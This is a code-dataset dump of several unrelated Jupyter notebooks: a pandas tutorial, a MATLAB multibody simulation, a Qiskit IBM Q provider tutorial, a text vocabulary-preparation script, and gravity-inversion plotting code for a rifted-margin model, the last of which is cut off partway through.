code
stringlengths
38
801k
repo_path
stringlengths
6
263
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Pandas examples # This notebook contains selected Pandas examples import pandas as pd # ## Load data # Load csv file into Pandas data frame df = pd.read_csv('housing.csv') # ## Explore dataframe # Display pandas dataframe (standard visualization) df # shows a quick statistic summary of your data df.describe() # Select a single column (creates Series) df["age"] # Selecting N rows df[0:3] # Select slice of the data frame - Rows from 25 to 30, specified columns df.loc[25:30, ["age", "dis", "lstat"]] # ## "Querying" Pandas # Conditional slicing, both conditions must apply df.loc[(df["crim"] > 0.3) & (df["crim"] < 0.4)] # Conditional slicing, either condition apply df.loc[(df["rad"] == 1) | (df["zn"] != 0)] # ## Transform # Create column from another column multiplied by 2 df["double_tax"] = df["tax"] * 2 df # Aggregate df.groupby("rad").sum()
experimental/notebook-workspace/tutorials/pandas.ipynb
% --- % jupyter: % jupytext: % text_representation: % extension: .m % format_name: light % format_version: '1.5' % jupytext_version: 1.14.4 % kernelspec: % display_name: Matlab % language: matlab % name: matlab % --- % # Test using Jupyter % %-------------------------------------------------------------------------% % %------------------------------Multibody Dynamic--------------------------% % %------------------------------A toy system-------------------------------% % % Problem: 12 spherical bodies in a box % % Author: <NAME> % % Data: 2Abr16 % % Version: 0.0 % %-------------------------------------------------------------------------% clc clear all addpath('./dynamic') addpath('./contact') % # Global variables % + global World % used to describe the world global BodyList % List with body identifiers global JointList % List with dynamic constrains identifiers global Bodies % Structure with every rigid bodies in the system global Joints % Structure with dynamics constrains global Motors global Motor global TT Er % - % # World parameters % Force to be applied on each body World.gravity=[0;0;-0.00981]; % Baumgarte Method World.alpha=5.0; World.beta=5.0; World.K=1000; % Debugging information % + World.C1=[]; World.Err=[]; World.delta = 0.01; World.Error = 1e-7; World.debuging = false; World.contact = false; World.dist=[]; World.FMNcontact = true; World.FMNdensity = false; World.box = [0 0 -4 ; 4 4 8]; World.Nx=(World.box(2,1)-World.box(1,1))/World.delta; World.Ny=(World.box(2,2)-World.box(1,2))/World.delta; World.Nz=(World.box(2,3)-World.box(1,3))/World.delta; World.Min=[2^log2(World.Nx)-1 2^log2(World.Ny)-1 2^log2(World.Nz)-1]'; World.Max=[2^(log2(World.Nx)+1)+1 2^(log2(World.Ny)+1)+1 2^(log2(World.Nz)+1)+1]'; World.ecoder_x=zeros(1,fix(World.Max(1))); World.INTecoder_x=zeros(1,fix(World.Max(1))); World.ecoder_y=zeros(1,fix(World.Max(2))); World.INTecoder_y=zeros(1,fix(World.Max(2))); World.ecoder_z=zeros(1,fix(World.Max(3))); World.INTecoder_z=zeros(1,fix(World.Max(3))); % - % Flexible Multibody system World.Flexible=false; World.ElasticNet = false; % force are generated using and elastic network World.Regularistion = false; % # Multibody system configuration BodyList={}; % the initial list of bodies is empty JointList={'Fix'}; % list of dynamic constrains Motors={}; % ## Ground: body C1 % Geometry Bodies.Ground.geo.m=1; % rod mass Bodies.Ground.geo.h=1; % rod length Bodies.Ground.geo.r=1; % rod radius Bodies.Ground.flexible=false; % Inertia tensor for body C1 Bodies.Ground.geo.JP=diag([1/12*(Bodies.Ground.geo.m*(3*Bodies.Ground.geo.r^2+Bodies.Ground.geo.h^2)),1/2*(Bodies.Ground.geo.m*Bodies.Ground.geo.r^2),... 1/12*(Bodies.Ground.geo.m*(3*Bodies.Ground.geo.r^2+Bodies.Ground.geo.h^2))]); % List of points in Ground Bodies.Ground.PointsList={'BoxC'}; Bodies.Ground.Points.BoxC.sPp=[0,0,0]'; % local frame coordinates % List of vectors in Ground Bodies.Ground.VectorsList={}; % Body initial values % + Bodies.Ground.r=[0,0,0]'; Bodies.Ground.r_d=[0,0,0]'; Bodies.Ground.r_dd=[0,0,0]'; Bodies.Ground.p=[1,0,0,0]'; Bodies.Ground.p_d=[0,0,0,0]'; Bodies.Ground.w=[0,0,0]'; Bodies.Ground.wp=[0,0,0]'; Bodies.Ground.np=[0,0,0]'; Bodies.Ground.contact=true; Bodies.Ground.box_center ='BoxC'; Bodies.Ground.box = [0 0 0 ; 4 4 0.1]; Bodies.Ground.shape = @(x) abs(x(1))<0 || abs(x(1))>4 || abs(x(2))<0 || abs(x(2))>4 || abs(x(3))<.1; Bodies.Ground.normal = @(x)[0 0 1]'; Bodies.Ground.ord=1; Bodies.Ground.exists=true; % debuging forces Bodies.Ground.forca=[]; % - % ## Body 12 spheres % Geometry % + init_1=.2; init_2=.2; init_3=1.0; inc=.3; cont_1=init_1; cont_2=init_2; cont_3=init_3; for i=1: 1 % 2 % 4 .. 138.4674 12 .. 169.5493 name=sprintf('C%d',i); Bodies.(name).geo.m=1; % rod mass Bodies.(name).geo.h=1; % rod length Bodies.(name).geo.r=1; % rod radius Bodies.(name).flexible=false; % Inertia tensor for spheres Bodies.(name).geo.JP=diag([1/12*(Bodies.(name).geo.m*(3*Bodies.(name).geo.r^2+Bodies.(name).geo.h^2)),1/2*(Bodies.(name).geo.m*Bodies.(name).geo.r^2),... 1/12*(Bodies.(name).geo.m*(3*Bodies.(name).geo.r^2+Bodies.(name).geo.h^2))]); %List of points in each sphere Bodies.(name).PointsList={'BoxC'}; Bodies.(name).Points.BoxC.sPp=[0,0,0]'; % local frame coordinates %List of vectors in each sphere Bodies.(name).VectorsList={}; % Body initial values Bodies.(name).r=[cont_1,cont_2,cont_3]'; if cont_1>3*init_1 cont_1=init_1; cont_3=cont_3+inc; end if cont_3>3*init_3 cont_1=init_1; cont_3=init_3; cont_1=cont_1+inc; end cont_3=cont_3+inc; Bodies.(name).r_d=[0,0,0]'; Bodies.(name).r_dd=[0,0,0]'; Bodies.(name).p=[1,0,0,0]'; Bodies.(name).p_d=[0,0,0,0]'; Bodies.(name).w=[0,0,0]'; Bodies.(name).wp=[0,0,0]'; Bodies.(name).np=[0,0,0]'; Bodies.(name).contact=true; Bodies.(name).box_center ='BoxC'; Bodies.(name).box = [-.2 -.2 -.2 ; .2 .2 .2]; Bodies.(name).shape = @(x)x'*x< 0.01 ; Bodies.(name).normal = @(x)x/norm(x); Bodies.(name).ord=i+1; Bodies.(name).exists=true; % debuging forces Bodies.(name).forca=[]; end % - % # System dynamic constrains % % Fixing ground Joints.Fix.type='Fix'; % fix body in the space Joints.Fix.body_1='Ground'; % body identifier % Transport Multibody system information % + BodyList=fieldnames(Bodies); World.nbodies = length(BodyList); % number of bodies in the system World.njoints = length(JointList); % number of joints in the system World.nmotors = length(Motors); % number of motors in the system World.NNodes = 0; % count number of nodes in the system World.Msize = World.NNodes*6+World.nbodies*6; % mass matrix size % - % # Mass matrix assembly % + y_d=[]; nbodies=length(BodyList); World.M=zeros(nbodies*6); for indexE=1:nbodies BodyName=BodyList{indexE}; Bodies.(BodyName).g=World.gravity; O=zeros(3,3); index=(indexE-1)*6+1; Bodies.(BodyName).index=index; % body index in the mass matrix % recursive definition for the initial force y_d=[y_d; Bodies.(BodyName).r;Bodies.(BodyName).p;Bodies.(BodyName).r_d;Bodies.(BodyName).w]; end % - % # Start simulation % Seting integration parameters % + t0=0; % Initial time t=4.5; % Final time 7.22 step=0.01; % Time-step tspan = [t0:step:t]; % Set integrator and its parameters fprintf('\n\n ODE45\n\n') tol=1e-5; options=odeset('RelTol',tol,'Stats','on','OutputFcn',@odeOUT); tic [T, yT]= ode45(@updateaccel, tspan, y_d, options); timeode45=toc % - % # Graphic output % + fig=figure; for index=1:nbodies BodyName=BodyList{index}; plot(yT(:,(index-1)*13+2), yT(:,(index-1)*13+3)) hold on end xlabel('y'),ylabel('z') % print(fig,'Positionyz','-dpng') hold off % - fig=figure; for index=1:nbodies BodyName=BodyList{index}; plot(yT(:,(index-1)*13+1), yT(:,(index-1)*13+3)) hold on end xlabel('x'),ylabel('z') % print(fig,'Positionxz','-dpng') hold off % Velocidades**2 fig=figure; for indexE=1:nbodies L=yT(:,(indexE-1)*13+8:(indexE-1)*13+10); v=[]; for i=1:length(L) v=[v L(i,:)*L(i,:)']; end plot(T, v) hold on end xlabel('T'),ylabel('v^2[m/s]') %print(fig,'velocity','-dpng') hold off % + % Error on the system constrains fig=figure; plot( Err) xlabel('iteration'),ylabel('Error') hold off % - % z vs time fig=figure; for indexE=1:nbodies L=yT(:,(indexE-1)*13+3); plot(T, L) hold on end xlabel('T'),ylabel('z') % ## 3D slider-crank Slieder_Crank_v01 % ## 3D slider-crank with clearance Slieder_Crank_clearance_v01
ToyDIMtools/Test.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # <img src="../../images/qiskit-heading.gif" alt="Note: In order for images to show up in this jupyter notebook you need to select File => Trusted Notebook" width="500 px" align="left"> # # The IBM Q Provider # In Qiskit we have an interface for backends and jobs that is useful for running circuits and extending to third-party backends. In this tutorial, we will review the core components of Qiskit’s base backend framework, using the IBM Q Provider as an example. # # The interface has three main component: providers, backends, and jobs: # # - providers: access backends and provides backend objects # - backends: run the quantum circuit # - jobs: keep track of the submitted job # ## The Provider # # The IBM Q Provider is an entity that provides access to groups of different backends (for example, backends available through the open IBM Q Experience, or specific groups in the IBM Q Network). # # The IBM Q Provider main point of entry is as `qiskit.IBMQ`. This is an object that allows obtaining `provider` instances, corresponding to your IBM Q Experience capabilities: # # - `providers()`: returns all the provider objects in your account. # - `get_provider(hub, group, project)`: returns the specified provider. # # Additionally, it has some extra functions for handling administrative tasks. The credentials can be saved to disk or used in a session and never saved. # # - `enable_account(token, url)`: enable the account in the current session # - `disable_account(**kwargs)`: disable the accounts from current session # - `save_account(token)`: save the account to disk # - `delete_account(**kwargs)`: delete the account from disk # - `load_account(**kwargs)`: load previously-saved account into session # - `active_account()`: list the account active in this session # - `stored_account()`: list the account saved to disk # # The `provider` objects obtained through `get_provider()` inherit from BaseProvider and implement the methods: # # - `backends()`: returns all backend objects known to the provider. # - `get_backend(name)`: returns the named backend. # # # <div class="alert alert-block alert-info"> # <b>Note:</b> The use of `provider` instances is the default way of retrieving backends from Qiskit 0.11 onwards - if you have been using earlier versions of Qiskit, check the "Updating from previous versions" section for more detailed instructions on updating and using the different options.</div> # </div> # + from qiskit import IBMQ IBMQ.providers() # - # Here we see that there are no providers. This is because no accounts have been loaded. # Let's start fresh and delete any accounts on disk. If no accounts are on disk, this will error IBMQ.delete_account() # verify that there are no accounts stored now IBMQ.stored_account() # To enable an account (useful for one-off use, or if you don't want to save to disk) # Change this to be your API Token my_api_token = '<PASSWORD>' provider = IBMQ.enable_account(my_api_token) # The `IBMQ.enable_account()` and `IBMQ.load_account()` methods will automatically return the provider for the open IBM Q Experience, for convenience. To see what providers you have available IBMQ.providers() # and backends which are available in the default provider provider.backends() # Disable that account (so we go back to no accounts active) IBMQ.disable_account() # Now no providers are available IBMQ.providers() # For convenience, you can save your account to disk: IBMQ.save_account(my_api_token, overwrite=True) # Now it should show up as present on disk # + # uncomment to print to screen (it will show your token and url) # IBMQ.stored_account() # - # but no account active in current session yet IBMQ.active_account() # now load up the account stored to disk provider = IBMQ.load_account() # If you have access to multiple hubs, you can obtain a provider for each of them using `.get_provider()`: provider_1 = IBMQ.get_provider(hub='open') provider_1.backends() provider_2 = IBMQ.get_provider(hub='ibm-q-internal') provider_2.backends() # ## Filtering the backends # # You may also optionally filter the set of returned backends, by passing arguments that query the backend's `configuration`, `status`, or `properties`. The filters are passed by conditions, and for more general filters you can make advanced functions using the lambda function. # # As a first example: only return currently operational devices provider.backends(operational=True, simulator=False) # only return backends that are real devices, have at most 5 qubits, and are operational provider.backends(filters=lambda x: x.configuration().n_qubits <= 5 and not x.configuration().simulator and x.status().operational==True) # Filter: show the least busy device (in terms of pending jobs in the queue) # + from qiskit.providers.ibmq import least_busy small_devices = provider.backends(filters=lambda x: x.configuration().n_qubits == 5 and not x.configuration().simulator) least_busy(small_devices) # - # The above filters can be combined as desired. # # If you just want to get an instance of a particular backend, you can use the `get_backend()` method. provider.get_backend('ibmq_16_melbourne') # ## The backend # # Backends represent either a simulator or a real quantum computer, and are responsible for running quantum circuits and returning results. Their `run` method takes in a `qobj` as input, which is a quantum object and the result of the compilation process; it returns a BaseJob object. This object allows asynchronous running of jobs for retrieving results from a backend when the job is completed. # # At a minimum, backends use the following methods, inherited from BaseBackend: # # # - `provider` - returns the provider of the backend. # - `name()` - gets the name of the backend. # - `status()` - gets the status of the backend. # - `configuration()` - gets the configuration of the backend. # - `properties()` - gets the properties of the backend. # - `run()` - runs a qobj on the backend. # # For remote backends, they must also support # # - `jobs()` - returns a list of previous jobs executed by this user on this backend. # - `retrieve_job()` - returns a job by a job_id. # # In future updates they will introduce the following commands # # - `defaults()` - gives a data structure of typical default parameters. # - `schema()` - gets a schema for the backend # # There are some IBM Q-only functions # # - `hub` - returns the IBM Q hub for this backend. # - `group` - returns the IBM Q group for this backend. # - `project` - returns the IBM Q project for this backend. backend = least_busy(small_devices) # Let's start with the `backend.provider`, which returns a provider object backend.provider # Next is the `name()`, which returns the name of the backend backend.name() # Next let's look at the `status()`: # # operational lets you know that the backend is taking jobs # pending_jobs lets you know how many jobs are in the queue backend.status() # The next is `configuration()` backend.configuration() # The next is `properties()` method backend.properties() # The next is `hub`, `group`, and `project`. For the IBM Q experience these will return `None` backend.hub backend.group backend.project # To see your last 5 jobs run on the backend, use the `jobs()` method of that backend for ran_job in backend.jobs(limit=5): print(str(ran_job.job_id()) + " " + str(ran_job.status())) # Then the job can be retreived using the `retrieve_job(job_id())` method job = backend.retrieve_job(ran_job.job_id()) # ## The Job object # # Job instances can be thought of as the “ticket” for a submitted job. They find out the execution’s state at a given point in time (for example, if the job is queued, running, or has failed), and allow control over the job. They have the following methods: # # - `status()` - returns the status of the job. # - `backend()` - returns the backend the job was run on. # - `job_id()` - gets the job_id. # - `cancel()` - cancels the job. # - `result()` - gets the results from the circuit run. # # IBM Q-only functions # # - `creation_date()` - gives the date at which the job was created. # - `queue_position()` - gives the position of the job in the queue. # - `error_message()` - gives the error message of failed jobs. # Let's start with the `status()`. This returns the job status and a message job.status() # To get a backend object from the job, use the `backend()` method backend_temp = job.backend() backend_temp # To get the job_id use the `job_id()` method job.job_id() # To get the result from the job, use the `result()` method result = job.result() counts = result.get_counts() print(counts) # If you want to check the creation date, use `creation_date()` job.creation_date() # Let's make an active example from qiskit import * from qiskit.compiler import transpile, assemble qr = QuantumRegister(3) cr = ClassicalRegister(3) circuit = QuantumCircuit(qr, cr) circuit.x(qr[0]) circuit.x(qr[1]) circuit.ccx(qr[0], qr[1], qr[2]) circuit.cx(qr[0], qr[1]) circuit.measure(qr, cr) # To compile this circuit for the backend, use the compile function. It will make a qobj (quantum object) that can be run on the backend using the `run(qobj)` method. qobj = assemble(transpile(circuit, backend=backend), shots=1024) job = backend.run(qobj) # The status of this job can be checked with the `status()` method job.status() # If you made a mistake and need to cancel the job, use the `cancel()` method. # + import time #time.sleep(10) job.cancel() # - # The `status()` will show that the job cancelled. job.status() # To rerun the job and set up a loop to check the status and queue position, use the `queue_position()` method. job = backend.run(qobj) from qiskit.tools.monitor import job_monitor job_monitor(job) result = job.result() counts = result.get_counts() print(counts) # ## Updating from previous versions # # Since July 2019 (and with `Qiskit` version `0.11`), the IBM Q Provider defaults to using the new [IBM Q Experience](https://quantum-computing.ibm.com), which supersedes the legacy Quantum Experience and Qconsole. # # If you have credentials for the legacy Quantum Experience or Qconsole stored in disk, you can make use of `IBMQ.update_account()` helper. This helper will read your current credentials stored in disk and attempt to convert them: # # + # IBMQ.update_account() # - # You can find more information on how to update your programs in the [README.md](https://github.com/Qiskit/qiskit-ibmq-provider/blob/master/README.md#updating-to-the-new-ibm-q-experience) file in the provider repository.
qiskit/basics/2_the_ibmq_provider.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import re import pickle import collections import numpy as np import os # + def clearstring(string): string = re.sub('[^\'\"A-Za-z0-9 ]+', '', string) string = string.split(' ') string = filter(None, string) string = [y.strip() for y in string] string = [y for y in string if len(y) > 3 and y.find('nbsp') < 0] return ' '.join(string) def read_data(location): list_folder = os.listdir(location) label = list_folder label.sort() outer_string, outer_label = [], [] for i in range(len(list_folder)): list_file = os.listdir('data/' + list_folder[i]) strings = [] for x in range(len(list_file)): with open('data/' + list_folder[i] + '/' + list_file[x], 'r') as fopen: strings += fopen.read().split('\n') strings = list(filter(None, strings)) for k in range(len(strings)): strings[k] = clearstring(strings[k]) labels = [i] * len(strings) outer_string += strings outer_label += labels dataset = np.array([outer_string, outer_label]) dataset = dataset.T np.random.shuffle(dataset) string = [] for i in range(dataset.shape[0]): string += dataset[i][0].split() return string def build_vocab(words, n_words): count = [['UNK', -1]] count.extend(collections.Counter(words).most_common(n_words - 1)) dictionary = dict() for word, _ in count: dictionary[word] = len(dictionary) data = list() unk_count = 0 for word in words: index = dictionary.get(word, 0) if index == 0: # dictionary['UNK'] unk_count += 1 data.append(index) count[0][1] = unk_count reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys())) return data, count, dictionary, reversed_dictionary # - strings = read_data('data') strings[:5] n_words = len(set(strings)) _,_,dictionary,reversed_dictionary = build_vocab(strings,n_words) with open('dataset-dictionary.p', 'wb') as fopen: pickle.dump(reversed_dictionary, fopen) with open('dataset-dictionary-reverse.p', 'wb') as fopen: pickle.dump(dictionary, fopen)
classification-comparison/preparation/prepare-vocab.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # 2D Isostatic gravity inversion - Figures # Este [IPython Notebook](http://ipython.org/videos.html#the-ipython-notebook) utiliza a biblioteca de código aberto [Fatiando a Terra](http://fatiando.org/) # + active="" # Figures - rifted margin (model A) # + # %matplotlib inline import numpy as np from scipy.misc import derivative import scipy as spy from scipy import interpolate import matplotlib #matplotlib.use('TkAgg', force=True) import matplotlib.pyplot as plt from matplotlib.ticker import MaxNLocator import math import cPickle as pickle import datetime import string as st from scipy.misc import imread from __future__ import division from fatiando import gravmag, mesher, utils, gridder from fatiando.mesher import Prism, Polygon from fatiando.gravmag import prism from fatiando.utils import ang2vec, si2nt, contaminate from fatiando.gridder import regular from fatiando.vis import mpl from numpy.testing import assert_almost_equal from numpy.testing import assert_array_almost_equal from pytest import raises plt.rc('font', size=16) # - import functions as fc # ## Observation coordinates. # + # Model`s limits ymin = 0.0 ymax = 195000.0 zmin = -1000.0 zmax = 37400.0 xmin = -100000.0 xmax = 100000.0 area = [ymin, ymax, zmax, zmin] # - ny = 150 # number of observation datas and number of prisms along the profile # coordinates defining the horizontal boundaries of the # adjacent columns along the profile y = np.linspace(ymin, ymax, ny) # coordinates of the center of the columns forming the # interpretation model n = ny - 1 dy = (ymax - ymin)/n ycmin = ymin + 0.5*dy ycmax = ymax - 0.5*dy yc = np.reshape(np.linspace(ycmin, ycmax, n),(n,1)) x = np.zeros_like(yc) z = np.zeros_like(yc)-150.0 ## Edge extension (observation coordinates) sigma = 2.0 edge = sigma*dy*n # ## Model parameters # + # Model densities # Indices and polygons relationship: # cc = continental crust layer # oc = ocean crust layer # w = water layer # s = sediment layer # m = mantle layer dw = np.array([1030.0]) ds = np.array([2600.0]) dcc = np.array([2790.0]) doc = np.array([2850.0]) dm = np.array([3200.0]) #dc = dcc # coordinate defining the horizontal boundaries of the continent-ocean boundary COT = 117000.0 # list defining crust density variance dc = np.zeros_like(yc) aux = yc <= COT for i in range(len(yc[aux])): dc[i] = dcc for i in range(len(yc[aux]),n): dc[i] = doc # defining sediments layers density vector ds = np.reshape(np.repeat(ds,n),(n,1)) # S0 => isostatic compensation surface (Airy's model) S0 = np.array([29500.0]) # - # ## Synthetic data gsyn = np.reshape(np.loadtxt('../data/A-model-rifted-margin-synthetic-gravity-data.txt'),(n,1)) # ## Water bottom tw = np.reshape(np.loadtxt('../data/A-model-rifted-margin-bathymetry.txt'),(n,1)) # ## True surfaces # + true_basement = np.reshape(np.loadtxt('../data/A-model-rifted-margin-true-basement-surface.txt'),(n,1)) true_moho = np.reshape(np.loadtxt('../data/A-model-rifted-margin-true-moho-surface.txt'),(n,1)) # True reference moho surface (SR = S0+dS0) true_S0 = np.array([29500.0]) true_dS0 = np.array([1500.0]) # + # True layer sediments thickness true_ts = true_basement - tw # True layer mantle thickness true_tm = S0 - true_moho # true parameters vector ptrue = np.vstack((true_ts, true_tm, true_dS0)) # - # ## Initial guess surfaces # + # initial guess basement surface ini_basement = np.reshape(np.loadtxt('../data/A-model-rifted-margin-initial-basement-surface.txt'),(n,1)) # initial guess moho surface ini_moho = np.reshape(np.loadtxt('../data/A-model-rifted-margin-initial-moho-surface.txt'),(n,1)) # initial guess reference moho surface (SR = S0+dS0) ini_dS0 = np.array([8500.0]) ini_RM = S0 + ini_dS0 # - # ## Known depths # + # Known values: basement and moho surfaces base_known = np.loadtxt('../data/A-model-rifted-margin-basement-known-depths.txt', ndmin=2) moho_known = np.loadtxt('../data/A-model-rifted-margin-moho-known-depths.txt', ndmin=2) # - # ## Initial guess data g0 = np.reshape(np.loadtxt('../data/A-model-rifted-margin-initial-guess-gravity-data.txt'),(n,1)) # ## Inversion model # + active="" # g = np.reshape(np.loadtxt('../data/A-model-rifted-margin-predicted-gravity-data-alphas_-10(3)_-8(1)_-7(2)_-7(1)_-6(2).txt'),(n,1)) # p = np.reshape(np.loadtxt('../data/A-model-rifted-margin-parameter-vector-alphas_-10(3)_-8(1)_-7(2)_-7(1)_-6(2).txt'),(2*n+1,1)) # gama_list = np.loadtxt('../data/A-model-rifted-margin-gama-list-alphas_-10(3)_-8(1)_-7(2)_-7(1)_-6(2).txt') # - g = np.reshape(np.loadtxt('../data/A-model-rifted-margin-predicted-gravity-data-alphas_X_-8(1)_-7(2)_-7(1)_-6(2).txt'),(n,1)) p = np.reshape(np.loadtxt('../data/A-model-rifted-margin-parameter-vector-alphas_X_-8(1)_-7(2)_-7(1)_-6(2).txt'),(2*n+1,1)) gama_list = np.loadtxt('../data/A-model-rifted-margin-gama-list-alphas_X_-8(1)_-7(2)_-7(1)_-6(2).txt') # + active="" # g0 = g.copy() # ini_basement = tw + p[0:n] # ini_moho = S0 - p[n:n+n] # ini_dS0 = p[n+n] # + active="" # g = np.reshape(np.loadtxt('../data/A-model-rifted-margin-predicted-gravity-data-alphas_-10(3)_-7(1)_-6(2)_-7(1)_-6(2)-sgm_1.txt'),(n,1)) # p = np.reshape(np.loadtxt('../data/A-model-rifted-margin-parameter-vector-alphas_-10(3)_-7(1)_-6(2)_-7(1)_-6(2)-sgm_1.txt'),(2*n+1,1)) # - # Inverrsion results RM = S0 + p[n+n] basement = tw + p[0:n] moho = S0 - p[n:n+n] # ## Lithostatic Stress # + sgm_true = 9.81*(10**(-6))*(dw*tw + ds*true_ts + dc*(S0-tw-true_ts-true_tm)+dm*true_tm) sgm = 9.81*(10**(-6))*(dw*tw + ds*p[0:n] + dc*(S0-tw-p[0:n]-p[n:n+n])+dm*p[n:n+n]) # - # ## Inversion model plot # + polygons_water = [] for (yi, twi) in zip(yc, tw): y1 = yi - 0.5*dy y2 = yi + 0.5*dy polygons_water.append(Polygon(np.array([[y1, y2, y2, y1], [0.0, 0.0, twi, twi]]).T, props={'density': dw - dcc})) polygons_sediments = [] for (yi, twi, si, dsi) in zip(yc, np.reshape(tw,(n,)), np.reshape(basement,(n,)), ds): y1 = yi - 0.5*dy y2 = yi + 0.5*dy polygons_sediments.append(Polygon(np.array([[y1, y2, y2, y1], [twi, twi, si, si]]).T, props={'density': ds - dcc})) polygons_crust = [] for (yi, si, Si, dci) in zip(yc, np.reshape(basement,(n,)), np.reshape(moho,(n,)), dc): y1 = yi - 0.5*dy y2 = yi + 0.5*dy polygons_crust.append(Polygon(np.array([[y1, y2, y2, y1], [si, si, Si, Si]]).T, props={'density': dci - dcc})) polygons_mantle = [] for (yi, Si) in zip(yc, np.reshape(moho,(n,))): y1 = yi - 0.5*dy y2 = yi + 0.5*dy polygons_mantle.append(Polygon(np.array([[y1, y2, y2, y1], [Si, Si, S0+p[n+n], S0+p[n+n]]]).T, props={'density': dm - dcc})) # + # %matplotlib inline plt.close('all') fig = plt.figure(figsize=(12,16)) import matplotlib.gridspec as gridspec heights = [8, 8, 8, 1] gs = gridspec.GridSpec(4, 1, height_ratios=heights) ax1 = plt.subplot(gs[0]) ax2 = plt.subplot(gs[1]) ax3 = plt.subplot(gs[2]) ax4 = plt.subplot(gs[3]) ax1.axhline(y=0.0, xmin=ymin, xmax=ymax, color='k', linestyle='--', linewidth=1) ax1.plot(0.001*yc, gsyn, 'or', mfc='none', markersize=7, label='simulated data') ax1.plot(0.001*yc, g0, '-b', linewidth=2, label='initial guess data') ax1.plot(0.001*yc, g, '-g', linewidth=2, label='predicted data') ax1.set_xlim(0.001*ymin, 0.001*ymax) ax1.set_ylabel('gravity disturbance (mGal)', fontsize=16) ax1.set_xticklabels(['%g'% (l) for l in ax1.get_xticks()], fontsize=14) ax1.set_yticklabels(['%g'% (l) for l in ax1.get_yticks()], fontsize=14) ax1.legend(loc='best', fontsize=14, facecolor='silver') ax2.plot(0.001*yc, sgm_true, 'or', mfc='none', markersize=8, label='simulated lithostatic stress') ax2.plot(0.001*yc, sgm, '-g', linewidth=2, label='predicted lithostatic stress') ax2.set_xlim(0.001*ymin, 0.001*ymax) ax2.set_ylim(770,860) ax2.set_ylabel('Lithostatic Stress (MPa)', fontsize=16) ax2.set_xticklabels(['%g'% (l) for l in ax2.get_xticks()], fontsize=14) ax2.set_yticklabels(['%g'% (l) for l in ax2.get_yticks()], fontsize=14) ax2.legend(loc='best', fontsize=14, facecolor='silver') ax3.axhline(y=0.0, xmin=ymin, xmax=ymax, color='k', linestyle='-', linewidth=1) aux = yc <= COT for (pwi) in (polygons_water): tmpx = [x for x in pwi.x] tmpx.append(pwi.x[0]) tmpy = [y for y in pwi.y] tmpy.append(pwi.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='lightskyblue') for (psi) in (polygons_sediments): tmpx = [x for x in psi.x] tmpx.append(psi.x[0]) tmpy = [y for y in psi.y] tmpy.append(psi.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='tan') for (pci) in (polygons_crust[:len(yc[aux])]): tmpx = [x for x in pci.x] tmpx.append(pci.x[0]) tmpy = [y for y in pci.y] tmpy.append(pci.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='orange') for (pcoi) in (polygons_crust[len(yc[aux]):n]): tmpx = [x for x in pcoi.x] tmpx.append(pcoi.x[0]) tmpy = [y for y in pcoi.y] tmpy.append(pcoi.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='olive') for (pmi) in (polygons_mantle): tmpx = [x for x in pmi.x] tmpx.append(pmi.x[0]) tmpy = [y for y in pmi.y] tmpy.append(pmi.y[0]) ax3.plot(tmpx, tmpy, linestyle='None') ax3.fill(tmpx, tmpy, color='pink') ax3.plot(yc, tw, '-k', linewidth=3) ax3.plot(yc, true_basement, '-k', linewidth=3, label='true surfaces') ax3.plot(yc, true_moho, '-k', linewidth=3) ax3.plot(yc, ini_basement, '-.b', linewidth=3, label='initial guess surfaces') ax3.plot(yc, ini_moho, '-.b', linewidth=3) ax3.plot(yc, basement, '--w', linewidth=3, label='estimated surfaces') ax3.plot(yc, moho, '--w', linewidth=3) ax3.axhline(y=true_S0+true_dS0, xmin=ymin, xmax=ymax, color='k', linestyle='-', linewidth=3) ax3.axhline(y=S0+ini_dS0, xmin=ymin, xmax=ymax, color='b', linestyle='-.', linewidth=3) ax3.axhline(y=S0+p[n+n], xmin=ymin, xmax=ymax, color='w', linestyle='--', linewidth=3) ax3.plot(base_known[:,0], base_known[:,1], 'v', color = 'yellow', markersize=15, label='known depths (basement)') ax3.plot(moho_known[:,0], moho_known[:,1], 'D', color = 'lime', markersize=15, label='known depths (moho)') #ax3.set_ylim((S0+p[n+n]), zmin) ax3.set_ylim((39000.0), zmin) ax3.set_xlim(ymin, ymax) ax3.set_xlabel('y (km)', fontsize=16) ax3.set_ylabel('z (km)', fontsize=16) ax3.set_xticklabels(['%g'% (0.001*l) for l in ax3.get_xticks()], fontsize=14) ax3.set_yticklabels(['%g'% (0.001*l) for l in ax3.get_yticks()], fontsize=14) ax3.legend(loc='lower right', fontsize=14, facecolor='silver') X, Y = fig.get_dpi()*fig.get_size_inches() plt.title('Density contrast (kg/m$^{3}$)', fontsize=17) ax4.axis('off') layers_list1 = ['water', 'sediment', 'continental', 'oceanic', 'mantle'] layers_list2 = ['', '', 'crust', 'crust', ''] colors_list = ['lightskyblue', 'tan', 'orange', 'olive', 'pink'] density_list = ['-1760', '-190', '0', '60', '410'] ncols = len(colors_list) nrows = 1 h = Y / nrows w = X / (ncols + 1) i=ncols-1 for color, density, layers1, layers2 in zip(colors_list, density_list, layers_list1, layers_list2): col = i // nrows row = i % nrows x = X - (col*w) - w yi_line = Y yf_line = Y - Y*0.15 yi_text1 = Y - Y*0.2 yi_text2 = Y - Y*0.28 yi_text3 = Y - Y*0.08 i-=1 poly = Polygon(np.array([[x, x+w*0.75, x+w*0.75, x], [yi_line, yi_line, yf_line, yf_line]]).T) tmpx = [x for x in poly.x] tmpx.append(poly.x[0]) tmpy = [y for y in poly.y] tmpy.append(poly.y[0]) ax4.plot(tmpx, tmpy, linestyle='-', color='k', linewidth=1) ax4.fill(tmpx, tmpy, color=color) 